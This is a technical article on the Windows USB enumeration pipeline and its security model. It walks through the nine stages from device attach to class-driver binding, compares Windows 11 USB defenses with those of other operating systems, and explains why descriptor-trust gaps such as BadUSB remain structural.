sequenceDiagram participant Dev as USB device participant XHCI as usbxhci.sys (host controller) participant Hub as usbhub3.sys (hub driver) participant CCGP as usbccgp.sys (composite parent) participant PnP as PnP manager participant IO as I/O manager participant Cls as Class driver (e.g. hidclass.sys) Dev->>XHCI: Stage 1 -- electrical attach + port status change XHCI->>Dev: Port reset + speed detection XHCI->>Hub: New device on port N (default address 0) Hub->>Dev: Stage 2 -- GET_DESCRIPTOR (device, first 8 bytes) Hub->>Dev: SET_ADDRESS Hub->>Dev: GET_DESCRIPTOR (device, full 18 bytes) Hub->>Dev: Stage 3 -- GET_DESCRIPTOR (config, first 9 bytes) Hub->>Dev: GET_DESCRIPTOR (config, full wTotalLength) Hub->>CCGP: Stage 4 -- composite split (if bDeviceClass=0x00 or IAD present) CCGP->>PnP: Per-interface PDOs PnP->>PnP: Stage 5 -- synthesize hardware + compatible IDs PnP->>PnP: Stage 6 -- INF database search with rank scoring PnP->>IO: Stage 7 -- KMCS check on chosen function driver IO->>Cls: Stage 8 -- attach class driver to device node IO->>IO: Stage 9 -- IOMMU policy (KDP, if armed)

The sources for each stage are cited inline in the prose that follows. We will walk all nine.

Stage 1: Physical detection (`usbxhci.sys`)

The xHCI host controller's hardware raises a port-status-change interrupt when a downstream port detects electrical attach. The host-controller driver -- usbxhci.sys on Windows 8 and newer -- handles the interrupt, drives the port through a reset, and detects the device's negotiated speed: Low (1.5 Mbps), Full (12 Mbps), High (480 Mbps), Super (5 Gbps), or Super+ Speed (10 Gbps and beyond) [@wiki-usb]. Microsoft's architecture documentation names this verbatim: "The xHCI driver is the USB 3.0 host controller driver" and pairs with the framework-derived host-controller extension Ucx01000.sys [@ms-usb-3-0-stack]. The device, at this point, has no identity. It has a port number and a speed. It does not yet have a USB bus address; it lives at the default address (zero) until the hub assigns one.

Stage 2: Initial device-descriptor fetch (`usbhub3.sys`)

The hub driver, usbhub3.sys, issues the first control transfer. The request is bmRequestType=0x80, bRequest=GET_DESCRIPTOR, wValue=0x0100, wLength=8 -- "give me the first eight bytes of the device descriptor at default address zero." The first eight bytes carry the bMaxPacketSize0 field, which tells the host how to size subsequent control transfers. SET_ADDRESS assigns a real bus address. A second GET_DESCRIPTOR then retrieves the full eighteen-byte USB_DEVICE_DESCRIPTOR.

This is the descriptor parser's first contact with attacker-controlled bytes -- the surface Andy Davis demonstrated as exploitable at Black Hat 2011 [@ncc-davis-2011]. The binary doing the parsing is usbhub3.sys, the same hub driver §4 Generation 4 names verbatim from the architecture reference [@ms-usb-3-0-stack]. The hub driver runs in ring zero. The bytes it parses originate in the peripheral's firmware. The trust contract is one-way.

Stage 3: Configuration-descriptor fetch

The hub driver issues a third GET_DESCRIPTOR for the first nine bytes of USB_CONFIGURATION_DESCRIPTOR to learn the wTotalLength field; a fourth fetch retrieves the full configuration, which includes one or more USB_INTERFACE_DESCRIPTORs, each followed by its USB_ENDPOINT_DESCRIPTORs and any class-specific descriptors (HID report descriptors, mass-storage CSW formats, audio control units).The two-fetch pattern -- read nine bytes to learn the size, then re-read the full block -- is a perfectly sensible engineering optimization. It also doubles the number of attacker-controlled parser entries the hub driver executes per insertion. The pragmatic optimization and the widened attack surface are the same line of code. All of this is parsed in usbhub3.sys [@ms-usb-3-0-stack]. This stage is the bulk of the kernel's adversarial-input surface for USB.

A composite USB device is a single physical peripheral that declares multiple independent interfaces. A common pattern is a wireless-keyboard-and-mouse receiver that presents one USB interface for the keyboard and a second for the mouse. The host treats each interface as a separate logical device and binds a class driver to each. Composite-device handling is the structural primitive that makes the BadUSB *"mass storage device that also presents a HID keyboard interface"* attack possible inside an unmodified USB peripheral.

Stage 4: Composite-device split (`usbccgp.sys`)

If the device descriptor's bDeviceClass is 0x00 (deferred to interface), or its bDeviceClass / bDeviceSubClass / bDeviceProtocol triple is 0xEF / 0x02 / 0x01 (the Multi-Interface Function class signalled by Interface Association Descriptors), and the device has more than one interface and a single configuration, the hub bus driver synthesizes an additional compatible ID of USB\COMPOSITE. The PnP manager's INF search then matches that compatible ID against Usb.inf and loads the generic parent driver. Microsoft Learn states the architecture verbatim: "the USB generic parent driver (Usbccgp.sys) ... the generic parent driver enumerates each of these interfaces as a separate device" [@ms-ccgp]; the USB 3.0 architecture page is verbatim about which layer does the synthesis: "The hub driver enumerates and loads the parent composite driver if deviceClass is 0 or 0xef and numInterfaces is greater than 1 in the device descriptor" [@ms-usb-3-0-stack]. usbccgp.sys then creates one child physical device object (PDO) per interface and lets the PnP manager bind a class driver to each independently. This is the moment a single physical thumb drive can become a thumb drive and a HID keyboard. Nothing in this stage cross-checks whether the combination is a plausible product; the device has declared it, and the host honors the declaration.

Stage 5: Hardware-ID and compatible-ID synthesis

The PnP manager builds two ordered lists from the descriptor fields it just parsed:

Hardware IDs (most specific): USB\VID_xxxx&PID_xxxx&REV_xxxx, USB\VID_xxxx&PID_xxxx, and for composite devices USB\VID_xxxx&PID_xxxx&MI_xx (interface number) [@ms-hwids].
Compatible IDs (fallback): USB\Class_xx&SubClass_xx&Prot_xx, then USB\Class_xx&SubClass_xx, then USB\Class_xx [@ms-compatids].

A hardware ID is the most specific identifier the Plug-and-Play manager uses to bind a driver to a device. For USB, the canonical hardware ID is `USB\VID_xxxx&PID_xxxx&REV_xxxx`, derived directly from the device descriptor's `idVendor`, `idProduct`, and `bcdDevice` fields. A driver INF that names a hardware ID exactly will outrank any compatible-ID match in the rank-scored search; vendors use this to ship a vendor-specific function driver for their own hardware. A compatible ID is a generic identifier the Plug-and-Play manager falls back to when no driver INF names the device's hardware ID. For USB, compatible IDs are class-coded: `USB\Class_03&SubClass_01&Prot_01` is a boot-protocol keyboard, `USB\Class_08&SubClass_06&Prot_50` is a SCSI-transparent mass-storage device. The inbox Microsoft class drivers (`hidusb.sys`, `usbstor.sys`, and so on) are registered against compatible IDs, which is why an unbranded thumb drive with no vendor INF still gets a working class driver on Windows.

Stage 6: INF database search with rank scoring

The PnP manager hands the two lists to the driver-store INF search. The algorithm is documented under "How Setup Selects Drivers" [@ms-pnp-rank] and is rank-arithmetic: each candidate INF is assigned a 32-bit rank, lowest wins. Roughly speaking, the rank is composed from three terms: an ID-match term (hardware-ID hit beats compatible-ID hit, and a higher hardware-ID in the list beats a lower one), a signer-trust term (a Microsoft-signed driver outranks a third-party-signed driver of equal ID specificity), and an OS-version term. The chosen INF's [Models] section names the function driver [@ms-inf]. The two-phase driver-package model (introduced in Windows 8) first installs the best driver-store match for fast operation, then queries Windows Update separately for a potentially better match [@ms-pnp-rank].

Worked example. A USB Mass Storage device exposes hardware ID USB\VID_0951&PID_1666 (a Kingston DataTraveler) and compatible ID USB\Class_08&SubClass_06&Prot_50 (SCSI-transparent bulk-only). The driver store contains the Microsoft inbox INF (usbstor.inf) registered against the compatible ID and signed by Microsoft, and a third-party INF registered against the hardware ID and signed by a paid-up OEM. The rank arithmetic decides which one wins.

flowchart TD Dev["Device exposes:
HWID=USB\VID_0951&PID_1666
CompatID=USB\Class_08&SubClass_06&Prot_50"] Dev --> Store["Driver store search"] Store --> A["Candidate A: usbstor.inf
Match on CompatID
Signer: Microsoft (rank 0x00)"] Store --> B["Candidate B: vendor.inf
Match on HWID
Signer: OEM (rank 0x01)"] A --> ARank["A.rank = HWID_RANK_BASE + CompatID_term + 0x00
= 0x0000 + 0x1003 + 0x00
= 0x1003"] B --> BRank["B.rank = HWID_term + Signer_term
= 0x0000 + 0x01
= 0x0001"] ARank --> D{"Compare ranks (lowest wins)"} BRank --> D D --> Win["B wins: vendor.inf binds to USB\VID_0951&PID_1666"]

The exact numeric constants are policy-controlled and vary by Windows version; the structural ordering is documented [@ms-pnp-rank] [@ms-hwids] [@ms-compatids] [@ms-inf]. The takeaway is that a USB device with no hardware-ID-specific INF in the driver store always falls back to the Microsoft inbox class driver matched on compatible ID, which is why an arbitrary thumb drive declaring bInterfaceClass=0x08 always finds usbstor.sys ready to load.

{` // Simplified model of the documented rank-scoring algorithm. // Lower numeric rank wins; the exact constants are version-policy controlled.

const HWID_BASE = 0x0000; const COMPATID_BASE = 0x1000; const POSITION_STEP = 0x0001; const SIGNER = { MICROSOFT: 0x00, OEM: 0x01, THIRD_PARTY: 0x02, UNSIGNED: 0x80 };

function rank(match) { const idTerm = match.kind === "HWID" ? HWID_BASE : COMPATID_BASE; const positionTerm = match.position * POSITION_STEP; return idTerm + positionTerm + SIGNER[match.signer]; }

const candidates = [ { name: "usbstor.inf (Microsoft inbox)", kind: "COMPATID", position: 3, signer: "MICROSOFT" }, { name: "vendor.inf (Kingston OEM)", kind: "HWID", position: 0, signer: "OEM" }, ];

const ranked = candidates .map(c => ({ ...c, rank: rank(c).toString(16).padStart(4, "0") })) .sort((a, b) => parseInt(a.rank, 16) - parseInt(b.rank, 16));

for (const c of ranked) console.log(`rank=0x${c.rank} ${c.name}`); console.log("Winner:", ranked[0].name); `}

Stage 7: KMCS verification of the chosen driver

The function driver named in the winning INF is loaded. Before the I/O manager attaches it, the loader checks its signature against the Kernel-Mode Code Signing policy: signature must chain to a Microsoft-trusted root, use SHA-256, and -- if Hypervisor-Enforced Code Integrity is enabled -- pass HVCI's per-page integrity check. The driver block list and the vulnerable-driver block list are consulted. The full signing-by-version matrix is documented on Microsoft Learn [@ms-kmcs] [@ms-drvsigning].

This is the canonical aha moment of the article. Kernel-Mode Code Signing certifies the driver. It does not certify what the driver consumes.

Imagine the system from KMCS's point of view. The Microsoft-signed `hidclass.sys` arrives at the kernel-mode loader. Its signature chains to a Microsoft-trusted root, its hash is correct, the HVCI memory-integrity policy is satisfied. Everything KMCS is asked to verify is verified. `hidclass.sys` loads.

At runtime, hidclass.sys accepts whatever HID input event arrives on the wire. The bytes that arrive carry no signature. The peripheral that produced them was never authenticated. KMCS protects the kernel from a malicious driver; the threat model assumes the data the driver consumes is honest. Against BadUSB, that assumption is exactly the inverse of true. The signed hidclass.sys is the attacker's tool: it is the binary that injects the malicious keystrokes into the active session.

KMCS is not broken. The work it does is real and necessary; without it, the BadUSB primitive would also let an attacker load arbitrary .sys files. KMCS just does not solve, and is not in the threat model of, the descriptor-trust problem. That gap is the article's recurring point.

Stage 8: Class-driver attachment

With the rank scoring decided and the function driver KMCS-verified, the I/O manager attaches the driver to the new device node and the class driver begins serving I/O. The function driver is drawn from the inbox class-driver roster catalogued in §6 -- hidclass.sys and hidusb.sys for HID; usbstor.sys for mass storage; winusb.sys for vendor-specific generic access via the Microsoft OS Descriptor mechanism [@ms-winusb]; the UcmCx.sys family for Type-C connector management [@ms-typec]; and the rest of the inbox roster in §6 [@ms-usb-3-0-stack]. This is the moment a USB device transitions from a parsed PDO to a binding that exposes per-class I/O semantics to user-mode -- the IRQL boundary at which descriptor-trust becomes operational rather than merely synthesised.

Stage 9: IOMMU enforcement (Kernel DMA Protection)

If Kernel DMA Protection is armed and the device is externally connected via a PCIe-tunneling fabric (Thunderbolt 3, Thunderbolt 4, USB4), the platform IOMMU places the device behind a device-specific translation domain. Pre-login DMA is blocked. Post-login DMA is allowed only into the device's own sandboxed memory if the driver opted in with DmaRemappingCompatible=1 in its INF [@ms-dmaremap]. KDP performs the IOMMU-mediated peripheral confinement quoted verbatim in §4 Generation 8 [@ms-kdp]. The deeper architectural treatment of Windows's hypervisor-enforced isolation primitives lives in the sibling article on the secure kernel and Virtualization-Based Security.

An IOMMU is a hardware unit that sits between peripherals and main memory, translating peripheral-issued DMA addresses through a per-device page table the operating system controls. Intel's implementation is called VT-d; AMD's is AMD-Vi; ARM platforms expose a System Memory Management Unit (SMMU). With an IOMMU enabled and configured by the OS, a peripheral that issues a DMA read to an address outside its sandboxed memory region gets a translation fault instead of a successful read. Without an IOMMU -- or with the IOMMU not enforcing policy on a given device -- peripheral DMA is unrestricted physical-address access to the kernel.

A USB 2.0 thumb drive performs no DMA. KDP is silent on it.

Note: Kernel DMA Protection is a Thunderbolt-and-PCIe-over-USB-C defense. It does not apply to USB 2.0 mass storage, HID, or audio. It does not apply to a USB 3.x flash drive talking the Mass Storage Class. It applies to PCIe peripherals tunneled over the same physical connector. If your threat model is "a malicious thumb drive types Mimikatz into my Start menu," KDP is not in your defense chain at all.

flowchart TD subgraph HC["Host controller layer"] XHCI["usbxhci.sys
USB 3.0 host controller driver"] UCX["Ucx01000.sys
USB host controller extension (KMDF)"] end subgraph Hub["Hub layer"] H["usbhub3.sys
USB 3.0 hub and enumeration"] end subgraph Comp["Composite split"] CCGP["usbccgp.sys
generic parent: one PDO per interface"] end subgraph Class["Class-driver layer"] HID["hidclass.sys + hidusb.sys
HID class"] STOR["usbstor.sys
Mass Storage Class"] AUDIO["usbaudio2.sys
Audio Class 2.0"] VIDEO["usbvideo.sys
USB Video Class (UVC)"] SER["usbser.sys
CDC Serial"] WIN["winusb.sys
Generic vendor access"] UCM["UcmCx / UcmUcsiCx / UcmTcpciCx
USB Type-C connector"] end XHCI --> UCX UCX --> H H --> CCGP CCGP --> HID CCGP --> STOR CCGP --> AUDIO CCGP --> VIDEO CCGP --> SER CCGP --> WIN CCGP --> UCM

Sources for the architecture diagram, layer by layer: [@ms-usb-3-0-stack] for the host-controller and hub layers (usbxhci.sys, Ucx01000.sys, usbhub3.sys); [@ms-ccgp] for the composite parent driver usbccgp.sys; [@ms-winusb] for winusb.sys; [@ms-typec] for the UCM class-extension family.

Key idea: Of the nine stages Windows executes between physical insertion and a class-driver attach, only two -- Stages 7 and 9 -- consult anything Windows holds as cryptographic truth. The other seven trust whatever the peripheral says, the moment the peripheral says it. KMCS certifies the driver, not the device. KDP certifies the bus, not the descriptor. The descriptor-trust gap is structural to USB; it lives in Stages 2 through 6, and no Windows-side defense has ever proposed to close it.

Nine stages. Two of them are the security model the article's reader thought was the security model. The other seven are descriptor parsing, ID synthesis, and INF search -- and they trust whatever the peripheral declares.

6. What Ships in Windows 11 24H2 / 25H2

Section 5 was the pipeline. This section is the roster: every Windows-11-shipping mechanism that defends the USB attack surface, what it actually does, and -- in the table at the end of this section -- what it does not.

The inbox class-driver roster. The class drivers that bind to a USB device after Stage 6 are mostly Microsoft-authored and ship in every Windows 11 SKU. They include hidclass.sys and hidusb.sys for keyboards, mice, joysticks, and HID-over-USB; usbstor.sys for the Mass Storage Class; usbprint.sys for the Printer Class; usbaudio2.sys for USB Audio Class 2.0; usbvideo.sys for the USB Video Class (webcams); usbser.sys for the CDC Serial class; winusb.sys for vendor-specific generic-access scenarios; the UcmCx.sys family for Type-C connector management; Hidi2c.sys for HID-over-I2C; and wpdusb.sys for MTP / PTP Windows Portable Devices [@ms-usb-3-0-stack] [@ms-typec] [@ms-winusb]. Every class driver in that list is signed under the Kernel-Mode Code Signing policy [@ms-kmcs]. Every class driver in that list trusts the descriptor that selected it.Hidi2c.sys is the sleeper attack surface on most laptops. Internal precision touchpads, fingerprint readers, and increasingly proximity sensors are HID-over-I2C devices wired to the chipset, not the external USB bus. They are not subject to USB-side Device Control policy because they are not USB devices; they are HID devices that happen to talk a different transport. The HID class definition is the same as it is on USB.

Kernel DMA Protection policy surface. KDP exposes three Group Policy values on DMAGuard\DeviceEnumerationPolicy: Block (the default; conservative posture), Allow with audit, and Allow all. The Microsoft Learn reference is verbatim about the default behavior: "By default, peripherals with DMA Remapping incompatible drivers are blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen" [@ms-kdp]. KDP's silicon and firmware prerequisites (IOMMU support, UEFI DMAR / IVRS publication) are non-trivial; on many post-2019 OEM platforms the toggle is shipping in BIOS but turned off until an administrator changes the firmware setting.

The ASR + Device Control + GPO triangle. The three deployable layers of enterprise USB policy on Windows 11 are an Attack Surface Reduction rule, the Microsoft Defender for Endpoint Device Control framework, and the older Group Policy Device Installation Restrictions family.

Attack Surface Reduction is a set of policy-defined kernel-and-userland rules in Microsoft Defender for Endpoint that block specific abusable behaviors. Each rule is identified by a GUID and toggled per-rule by Group Policy, Intune, or PowerShell. ASR rules sit in front of common execution sinks (Office child processes, script-from-email runs, USB-borne executables) and refuse the operation when the rule is in Block mode. They are a policy layer on top of the Windows execution model, not a re-design of it.

The ASR rule that targets USB-borne malware is "Block untrusted and unsigned processes that run from USB", GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 on Microsoft's ASR-rule-to-GUID matrix [@ms-asr-rules]. (Several published guides cite the unrelated GUID d4f940ab-401b-4efc-aadc-ad5f3c50688a for the same rule; per the matrix that GUID is actually "Block all Office applications from creating child processes". The corrected USB GUID is the one to deploy.) Microsoft Defender for Endpoint Device Control is the granular layer: groups, rules, and settings let an administrator allow read-only-for-corporate-encrypted-USB, deny-write-for-personal-USB, allow corporate HID by VID/PID/serial, and a dozen other primitive combinations per-user [@ms-devcontrol]. The older Group Policy Device Installation Restrictions framework has eight policies (AllowedDeviceClasses, DenyDeviceClasses, AllowedDeviceIDs, DenyDeviceIDs, and so on) and uses Setup Class GUIDs such as GUID_DEVCLASS_USB ({36FC9E60-C465-11CF-8056-444553540000}) and GUID_DEVCLASS_HIDCLASS ({745A17A0-74D3-11D0-B6FE-00A0C90F57DA}) for class-wide rules [@ms-gpo-devinstall] [@ms-devsetupclasses].

BitLocker To Go. The full-volume-encryption story for removable media on Windows has been BitLocker To Go since Windows 7. On Windows 11 the default cipher is XTS-AES-128 (administrators can promote to XTS-AES-256 via the Group Policy "Choose drive encryption method and cipher strength" under Removable Data Drives), and the Group Policy "Deny write access to removable drives not protected by BitLocker" is the enterprise opt-in to force the contract [@ms-bitlocker]. BitLocker To Go protects the data on a USB stick if it is lost or stolen. It does not protect the host from a malicious peripheral, because the malicious peripheral does not present itself as a BitLocker-managed volume; it presents itself as whatever it pleases at Stage 5.

USB-IF Authentication Specification Revision 1.0. Published in the form of an ECN and errata dated January 7, 2019 [@usbif-auth-spec], this specification defines cryptographic peripheral identity using ECDSA P-256, X.509 certificate chains, and SHA-256 hashing -- the same primitives Windows already uses for KMCS and BitLocker. The standard exists. Windows ships no in-box consumer. No major host operating system in 2026 consumes it. The 2019 promise of cryptographic device identity has been seven years away for seven years.

Note: USB-IF Authentication 1.0 is the only mechanism in this entire roster that would architecturally close the BadUSB-class HID-injection problem. Every other defense in the table below mitigates the symptoms of the descriptor-trust gap. USB-IF Authentication would close the gap itself. It was published as an ECN seven years ago [@usbif-auth-spec]. Windows does not consume it. macOS does not consume it. Linux does not consume it. The defense is not absent because it is hard; it is absent because no host operating system has committed engineering to it. That is the institutional gap.

The SOTA roster, in a comparison table:

Mechanism	What it gates	Attack class addressed	Does NOT address
KMCS [@ms-kmcs]	Loading of unsigned `.sys` files into ring zero	Arbitrary kernel-mode driver loads	Descriptors a signed driver consumes
Kernel DMA Protection [@ms-kdp]	Pre-login + post-login DMA from Thunderbolt / USB4 PCIe endpoints	Thunderclap-class DMA attacks	USB 2.0/3.x storage and HID; pre-DMAR firmware platforms
ASR USB rule `b2b3f03d-...` [@ms-asr-rules]	Unsigned and untrusted process launch from USB-mounted volume	AutoRun-like execution; mass-storage-borne executables	HID-injection (no process is launched); descriptor-parser bugs
MDE Device Control [@ms-devcontrol]	Per-VID/PID/serial allow-deny on read, write, execute, file-walk	Any policy-named USB device class	Devices the policy explicitly allows
GPO Device Installation Restrictions [@ms-gpo-devinstall] [@ms-devsetupclasses]	Setup-class-wide allow-deny by Device Setup Class GUID	Whole-class blocks (e.g. all USB Storage)	Devices the policy allow-lists
BitLocker To Go [@ms-bitlocker]	Encryption of data at rest on removable USB volumes	Lost / stolen thumb drive	Malicious peripheral; host compromise
AutoRun-disable (KB971029 era) [@krebs-feb2011] [@wiki-autorun]	`autorun.inf`-driven AutoPlay launch on insert	Conficker-class AutoRun worms	HID injection; descriptor parser bugs
Driver Block List / Vulnerable Driver Block List [@ms-kmcs]	Loading of named known-bad signed `.sys` files	Bring-Your-Own-Vulnerable-Driver	New (unlisted) malicious-but-signed driver
USB-IF Authentication 1.0 [@usbif-auth-spec]	Cryptographic peripheral identity at enumeration	Descriptor-trust impossibility result (BadUSB)	(Standard exists; Windows does not consume it)

{` // Emulates the PowerShell check: // $p = Get-MpPreference // $p.AttackSurfaceReductionRules_Ids // $p.AttackSurfaceReductionRules_Actions // In a real Windows 11 enterprise rollout, run the PowerShell as administrator.

const USB_RULE_GUID = "b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4"; // "Block untrusted and unsigned processes from USB" const ACTION = { DISABLED: 0, BLOCK: 1, AUDIT: 2, WARN: 6 };

// Sample output that a healthy enterprise endpoint should produce. const sample = { ids: [USB_RULE_GUID, "d4f940ab-401b-4efc-aadc-ad5f3c50688a", "75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84"], actions: [ACTION.BLOCK, ACTION.BLOCK, ACTION.BLOCK], };

Eight Windows-shipping mechanisms, one missing implementation. The implementation gap is structural: the only complete defense in the roster is the one Windows does not ship.

7. USB Security on Non-Windows Platforms

Windows is not the only OS that inherits USB's descriptor-trust premise. Every host operating system since 1996 has inherited the same contract; each has staked out a different position on how to live with it. The contrast clarifies what Windows chose.

macOS on Apple Silicon (Ventura 2022, extended Sequoia 2024). Apple Support is verbatim on the prompt: "When you use a new or unknown USB accessory, Thunderbolt accessory, or SD card with your Mac laptop with Apple silicon, you get an alert that asks you to allow the accessory to connect" [@apple-mac-usb]. The same page documents the four user-selectable modes -- Always ask, Ask for new accessories, Automatically allow when unlocked, Always allow -- and the lockout window: "If your Mac has been locked for 3 or more days, you might need to unlock it to use a previously allowed accessory again" [@apple-mac-usb]. Apple is the only major host OS that ships a user-facing prompt as the default posture.Apple Silicon Macs enforce the accessory-prompt at the hardware level through the Secure Enclave Processor, not purely in software. This is architectural inference from Apple's general SEP-policy documentation; Apple Support pages describe the user-visible behavior, not the SEP-side enforcement chain. The architectural distinction matters because the prompt is not a kernel-side policy a privileged process can bypass.

iOS USB Restricted Mode (iOS 11.4.1, 2018; USB-C version, iOS 17+). Apple Support carries the iOS variant verbatim: "By default, you need to first unlock your iPhone or iPad to connect to an accessory or computer" [@apple-ios-usb]. Modern USB-C iPhones and iPads expose the same four-mode setting as the Mac: Always Ask, Ask for New Accessories, Automatically Allow When Unlocked, Always Allow [@apple-ios-usb]. iOS came first; macOS adopted the same UX pattern four years later.

ChromeOS. USB device authorization on ChromeOS is tied to the user-signin state; HID-class injection vectors are default-deny after suspend on managed devices. ChromeOS's documentation of the exact enforcement chain is sparse, so we will only describe what is publicly observable: the policy hooks exist, the enterprise-managed posture is default-deny, the consumer posture is default-allow.

Linux usbguard. The open-source usbguard daemon implements per-user, per-device USB authorization on top of the kernel's sysfs authorized flag [@usbguard]. The architectural cousin of Windows's Defender for Endpoint Device Control, usbguard ships a mature policy language (usbguard list-devices, usbguard allow-device, declarative rules.conf) and integrates cleanly with PolicyKit. The catch is that no major Linux distribution enables usbguard by default; it is opt-in software a sysadmin installs. Linux's kernel has had the authorized sysfs flag since 2007; what it has not had is a default-deny posture out of the box.

OpenBSD umass(4) / FreeBSD opt-in USB policy. The BSD family of operating systems ships conservative defaults: separated drivers per class, no autorun.inf-equivalent in the file manager, and a documented user-mode authorization story. Deployment scale is small; the design is included here only to illustrate that a default-deny posture is technically possible inside an inherited USB protocol contract.

The cross-platform comparison:

Platform	Default posture	Model	Pre-login HID injection	DMA isolation
Windows 11 25H2	Allow on insert	Policy frameworks layered over descriptor trust [@ms-asr-rules] [@ms-devcontrol] [@ms-gpo-devinstall]	Mitigated only by ASR USB rule + Device Control allow-list (enterprise opt-in)	Kernel DMA Protection on capable platforms [@ms-kdp]
macOS (Apple Silicon)	Prompt user	User-facing approval dialog, 3-day re-prompt window [@apple-mac-usb]	Mitigated by default prompt (consumer + enterprise)	Apple-managed IOMMU + SEP policy
iOS (USB-C)	Locked-until-unlock	User-facing approval dialog [@apple-ios-usb]	Mitigated by default prompt	Apple-managed IOMMU + SEP policy
ChromeOS (managed)	Default deny after suspend	Sign-in-state-gated authorization	Mitigated by default deny (managed devices)	Platform-IOMMU policy
Linux + usbguard	Default deny if installed	User-space daemon over kernel `authorized` flag [@usbguard]	Mitigated if `usbguard` installed (opt-in)	Distribution-dependent
Stock Linux	Allow on insert	Kernel `authorized` flag exists, default is allowed	Not mitigated	Distribution-dependent
OpenBSD / FreeBSD	Conservative by default	Per-class driver opt-in	Not the default attack surface (low deployment)	Limited

Two platforms (Apple's, both of them) prompt the user as the default posture. One (Linux) ships an opt-in user-space daemon. Windows is the only major platform that combines a kernel-mode device-control framework with cross-platform telemetry inside Microsoft Defender for Endpoint -- and the only one still relying entirely on enterprise opt-in for the HID-injection mitigation. The consumer default on Windows 11 25H2 is allow-on-insert.

8. What Windows Cannot Defend Against

We have walked the modern pipeline and seen the roster of defenses. We owe the reader a clean accounting of where the model is structural -- where no plausible Windows version closes the gap without breaking USB compatibility. There are five named limits, and none of them are bugs.

Limit 1: The descriptor-trust impossibility result. USB has, by specification, no out-of-band identity. A peripheral that declares itself to be a keyboard is a keyboard for purposes of the bus-enumeration handshake. The Wikipedia reference is explicit about the device-class architecture in which the peripheral, not the host, owns the declaration [@wiki-usb]. Until USB-IF Authentication (cryptographic device identity) is universal at the silicon level, this gap is structural to the protocol. Closing it on the host side -- by, say, refusing to bind a class driver until the device signs a challenge -- would break every existing USB device on the market.

Limit 2: HID-class trust is structural, not technical. A USB HID keyboard issues input events to the focused window. Windows has no way to know whether the user is the source of those events or whether a reprogrammed thumb drive is. The SR Labs disclosure is verbatim about why the host cannot tell the difference: the same Phison or Cypress controller chip that ships in a thumb drive can be reprogrammed to enumerate as a HID device with a vendor-controlled report descriptor [@srlabs-badusb-pdf] [@wiki-badusb]. Microsoft Defender for Endpoint Device Control supports granular HID rules, but they are opt-in, enterprise-only, and inherently break every external keyboard the policy does not allow. The structural cost of fixing this is breaking USB.

Limit 3: Firmware reprogrammability of commodity USB controllers. Phison, Cypress, Genesys, Realtek, and the rest of the commodity USB-controller market ship field-flashable firmware. The Psychson toolchain demonstrated the Phison PS2251-03 reflash end-to-end and made it reproducible in a researcher's afternoon: "firmware patches have only been tested against PS2251-03 firmware version 1.03.53 ... DriveCom ... EmbedPayload ... Injector" [@psychson-repo]. The O.MG Cable productionized the technique inside a USB-A-to-Lightning cable form factor, proving the attack is now commercial-supply-chain-implantable [@omg-cable]. The host operating system has no view into the controller's firmware, no way to attest it, and no way to reject a peripheral that exposes a different identity post-flash than it did pre-flash.

Limit 4: Kernel DMA Protection is opt-in at three layers. Silicon (the platform must have an IOMMU), firmware (the UEFI must publish DMAR / IVRS tables), and driver (the driver must declare DmaRemappingCompatible=1 in its INF) [@ms-kdp] [@ms-dmaremap]. Many post-2019 OEM platforms ship with the firmware toggle off in BIOS. Worse, the Thunderclap research demonstrated that even on IOMMU-enabled systems, shared IOMMU contexts between a peripheral and a kernel driver are a viable attack vector [@ndss-thunderclap]. KDP also has no view at all of USB 2.0/3.x mass storage or HID, which do not perform DMA.

Windows only uses the IOMMU in limited cases and remains vulnerable. -- Markettos, Rothwell, Gutstein, Pearce, Neumann, Moore, and Watson, *Thunderclap*, NDSS 2019 [@ndss-thunderclap]

Limit 5: The descriptor parser is C code in the kernel. usbhub3.sys and usbccgp.sys are partially undocumented, are closed-source, and parse adversarial input in a memory-unsafe language.Microsoft has not published the source for usbhub3.sys or usbccgp.sys; the architectural descriptions on Microsoft Learn describe the externally visible behavior of these drivers, not their internal parsing routines or memory-safety properties. Any claim about their specific implementation must be hedged accordingly. The conclusion that they parse adversarial input in C is inferred from the Windows-kernel codebase's language conventions and from the public record of descriptor-parser CVEs over the last fifteen years. Andy Davis named the surface in 2011 [@ncc-davis-2011], and Google's syzkaller-USB program -- a public-record proxy for the wider community's descriptor-parser fuzzing effort -- has been producing kernel-side descriptor-parser bugs across host operating systems since 2017 [@syzkaller-usb]. Until the parser is rewritten in a memory-safe language, this is finite-but-non-zero kernel-mode attack surface. Linux's usbcore has ongoing Rust experiments under the upstream Rust-for-Linux project [@rust-for-linux]; Windows has not publicly committed to a similar rewrite.

Note: None of these five limits is a Windows bug. The descriptor-trust gap is in USB. The HID-class trust gap is in the HID class definition. The firmware-reprogrammability gap is in commodity controller silicon. The KDP gap is in the layered opt-in posture of IOMMU-on-platform DMA isolation. The C-in-the-kernel gap is the price of Windows's compatibility-first kernel-driver model. Closing any one of them on the Windows side, in isolation, would either break the USB device market (limits 1-3), require commodity-silicon redesign (limit 3 again), or require a multi-year rewrite the engineering organization has not committed to (limit 5).

Key idea: The USB attack surface on Windows is the price Windows pays for being USB-compatible. Five named gaps. Zero of them are bugs. Each is a structural cost of inheriting a 1996 protocol contract written when peripheral firmware was not field-flashable and the descriptor-trust assumption was at least defensible. In 2026 the assumption is indefensible and the contract is everywhere. The defense Windows ships is the best layered mitigation anyone has built around the gap; it does not close the gap.

9. Open Problems

If the limits are structural, the open problems are sociological: who adopts the standard that already exists, who funds the rewrite that nobody has shipped, who builds the heuristic that no production OS has.

USB-IF Authentication 2.0 / 3.0 uptake. The standard exists as a January 2019 ECN [@usbif-auth-spec]. Device-vendor uptake is near zero outside specialized industries (automotive, medical). Windows has no in-box consumer. The blocker is not cryptographic feasibility -- ECDSA P-256 over SHA-256 with X.509 chains is everyday code -- it is two-sided market adoption: peripheral vendors will not ship the silicon until host operating systems consume it; host operating systems will not consume it until enough peripherals ship it. Someone in the duopoly of major host-OS shipping has to commit first. As of mid-2026 no one has. Current best partial result: the same ECDSA-plus-X.509 attestation pattern has been deployed at scale in adjacent ecosystems -- Apple's Find My accessory-attestation network and the automotive / medical USB-Authentication-mandatory tiers -- demonstrating that the cryptographic primitive itself is silicon-shippable; what remains is OS-side consumption.

